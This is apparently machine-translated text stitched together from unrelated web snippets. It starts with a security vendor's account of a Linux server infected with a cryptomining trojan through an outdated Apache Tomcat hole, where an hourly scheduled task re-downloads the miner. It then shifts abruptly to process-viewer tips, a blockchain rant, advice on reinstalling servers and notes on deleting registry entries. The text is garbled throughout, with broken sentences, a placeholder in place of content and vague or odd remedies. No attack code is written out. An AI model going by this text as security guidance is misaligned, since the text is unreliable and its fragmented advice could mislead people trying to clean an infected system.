Downloaded mining program
a new customer recently consulted with sine security company, saying that his server often fails to open the website of the card, and the remote connection to the server is extremely slow. Sometimes the Ping value reaches 300-500, and he often switches. After listening to the customer's words,
will generally judge that he has been attacked by CC + DDoS mixed traffic, It's strange to say that there is no traffic attack on the computer room. It's not a traffic attack, but it also causes the server card and website to fail to open. What kind of attack is this? In order to solve the problem of
client server card, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server
{rrrrrrr}
Mining Trojan horse is also designed. If the mining process is forced to stop by customers, it will automatically start to continue mining to achieve uninterrupted mining.
careful inspection shows that it is through setting the hourly task plan, remotely downloading shell mining Trojan horse, and then executing, Check whether the current process exists or not. If not, start the Trojan horse to mine
a detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease through the security detection and analysis of our security engineers, we found that the server uses Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache, Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server,
virus. If the data was encrypted, the loss would be great. The client was a platform, and the client's data was very important. After finding out the mining Trojan horse,
do customers need to know how the server is attacked? Was the Trojan horse uploaded? It can prevent the attack
in the later stage
sine security engineer immediately repairs the Apache vulnerability and clears the Trojan horse. So far, the problem has been solved, the client server
runs stably, and the network station opens normally
if the process
magic rabbit is more practical
you can see all the processes in the process option of magic rabbit
the system process is green and marked as system process, other processes are black, and the location of the file of that process in your computer is displayed, And right click the process, there will be online check the process information, a little open, there is a very clear label, such as: whether it is a Trojan horse, whether it is an error, whether it is a background process, whether it occupies memory, whether it is a spy, and a series of instructions.
antivirus, if you can't kill it, you can check the program with high CPU or GPU occupation and manually delete it. If you can't, you can't change the hard disk (the disk where the mining program is located)... Change the computer
Please find out what blockchain is and how it is applied in the supply chain scenario, and then you will find out what you said. Although I will popularize science for you, I will show it to other readers. You don't even understand what blockchain is and what the essence of blockchain is, so you ask this kind of question. The layman seems to be very professional, Experts are laughing at you
therefore, the application scenarios with blockchain technology as the underlying technology only verify the accuracy of the data itself, but cannot verify the authenticity of the associated objects. As you said, if the data input is wrong, the data saved by blockchain is also wrong, but it cannot be changed again, which is also a disadvantage of blockchain technology, However, this does not mean that there is no application scenario for blockchain technology. It is still very useful, but it will not be mentioned here
Backup the host data, and then re install the system
-
do not use the old version of the system. It is recommended that after re installing the system in 2012 or 2016
-
delete other accounts except the administrator, and then install 360 security guard to patch
-
install the server security software
< / OL >
when you download this software, did you install it for the first time? Or when you click for the first time, is there a prompt to write the registration information to the computer? If not, you can delete it. You don't need to uninstall
if it is installed, you can find it in the installation location or in the control panel. If you don't install it and just write some registration information when you click, you can delete the registration information about the software in the registry at most after deleting the software from the hard disk. Even if you don't delete the registration information, it won't have any impact.